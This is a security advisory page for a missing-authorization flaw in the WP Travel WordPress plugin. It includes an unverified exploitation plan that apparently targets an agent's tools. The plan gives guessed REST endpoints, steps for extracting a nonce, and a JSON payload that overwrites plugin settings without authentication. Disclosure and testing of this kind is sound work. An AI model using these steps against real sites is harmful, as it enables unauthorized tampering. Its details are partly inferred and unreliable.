WP-Safety
CVE-2026-24568

Travel <= 11.1.0 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
11.1.1
Patched in
14d
Time to patch

Description

The Travel plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 11.1.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=11.1.0
PublishedJanuary 21, 2026
Last updatedFebruary 3, 2026
Affected pluginwp-travel

What Changed in the Fix

Changes introduced in v11.1.1

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v11.1.0
Browse source Download .zip
Patched v11.1.1
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-24568 (WP Travel <= 11.1.0) ## 1. Vulnerability Summary The **WP Travel** plugin (versions up to 11.1.0) contains a missing authorization vulnerability in its REST API implementation, specifically related to the plugin's setup and configuration functionality. …

Show full research plan

Exploitation Research Plan: CVE-2026-24568 (WP Travel <= 11.1.0)

1. Vulnerability Summary

The WP Travel plugin (versions up to 11.1.0) contains a missing authorization vulnerability in its REST API implementation, specifically related to the plugin's setup and configuration functionality. The vulnerability allows unauthenticated attackers to modify plugin settings by making direct requests to REST API endpoints that lack proper permission_callback validation.

2. Attack Vector Analysis

  • Endpoint: /wp-json/wp-travel/v1/settings or /wp-json/wp-travel/v1/setup/save (inferred from admin-setup-page.js and admin-settings.js).
  • Method: POST
  • Authentication: None Required (PR:N).
  • Payload Type: application/json
  • Vulnerable Parameter: The JSON body containing the settings object.
  • Preconditions: The plugin must be active. No specific setup wizard state is required as the REST routes are registered on rest_api_init.

3. Code Flow

  1. Registration: The plugin registers REST routes in inc/rest-api/class-wp-travel-rest-settings-controller.php (or similar) during the rest_api_init hook.
  2. Missing Check: The register_rest_route call for the settings endpoint (POST method) fails to implement a permission_callback that verifies current_user_can('manage_options').
  3. Execution: When a POST request is received at /wp-json/wp-travel/v1/settings, the update_item or save_settings method is called.
  4. Sink: The settings provided in the request body are passed to update_option('wp_travel_settings', ...) without verifying the requester's identity.

4. Nonce Acquisition Strategy

While the REST API usually requires a wp_rest nonce for authenticated users to prevent CSRF, unauthenticated requests (without cookies) often bypass this check if the permission_callback is set to __return_true or is missing. If a nonce is enforced even for unauthenticated users, it can be retrieved from the localized script data.

  • Localized Variable: wp_travel_setup_vars or wp_travel_obj (inferred).
  • Target Page: Any page where the plugin is active, or the setup page (if accessible).
  • Strategy:
    1. Create a page with a WP Travel shortcode to ensure scripts are loaded.
    2. Use browser_navigate to visit the page.
    3. Use browser_eval to extract the nonce.
    4. JavaScript: window.wp_travel_setup_vars?.nonce or window.wpApiSettings?.nonce.

5. Exploitation Strategy

Step 1: Discover the Endpoint

Test the settings endpoint to see if it responds to unauthenticated GET requests (information disclosure) and POST requests.

Step 2: Craft Payload

The payload should target a non-destructive but verifiable setting, such as the currency or the number of itineraries per page.

  • Target Setting: currency_code or itineraries_per_page.
  • Payload:
{
    "settings": {
        "currency_code": "HACKED",
        "itineraries_per_page": "1337"
    }
}

Step 3: Execute Unauthenticated Request

Using the http_request tool:

  • URL: http://localhost:8080/wp-json/wp-travel/v1/settings
  • Method: POST
  • Headers:
    • Content-Type: application/json
  • Body: {"settings": {"currency_code": "HACKED"}}

6. Test Data Setup

  1. Activate Plugin: Ensure wp-travel is installed and active.
  2. Initialize Settings: Run wp option update wp_travel_settings '{"currency_code":"USD"}' --format=json to set a baseline.
  3. Create Extraction Page:
    wp post create --post_type=page --post_title="Travel Test" --post_status=publish --post_content='[wp_travel_itineraries]'

7. Expected Results

  • Response: The server should return a 200 OK or 201 Created with the updated settings in the response body.
  • Data Change: The wp_travel_settings option in the WordPress database will be updated with the attacker-supplied values.

8. Verification Steps

  1. Database Check:
    wp option get wp_travel_settings --format=json
    Verify that "currency_code" is now "HACKED".
  2. UI Check: Navigate to the WP Travel settings page in the admin dashboard (as an admin) and observe the modified currency.

9. Alternative Approaches

  • Setup Save Endpoint: If /wp-json/wp-travel/v1/settings is protected, try /wp-json/wp-travel/v1/setup/save_settings.
  • Import Trigger: If settings modification is restricted, attempt to trigger the trip import function via /wp-json/wp-travel/v1/setup/import_demo_data.
  • Nonce Header: If the request fails with a 403, obtain a nonce using browser_eval("wpApiSettings.nonce") and include it in the X-WP-Nonce header.
References
https://www.wordfence.com/threat-intel/vulnerabilities/id/0b48a35a-1110-4b63-bd7e-cc82350afa0e?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database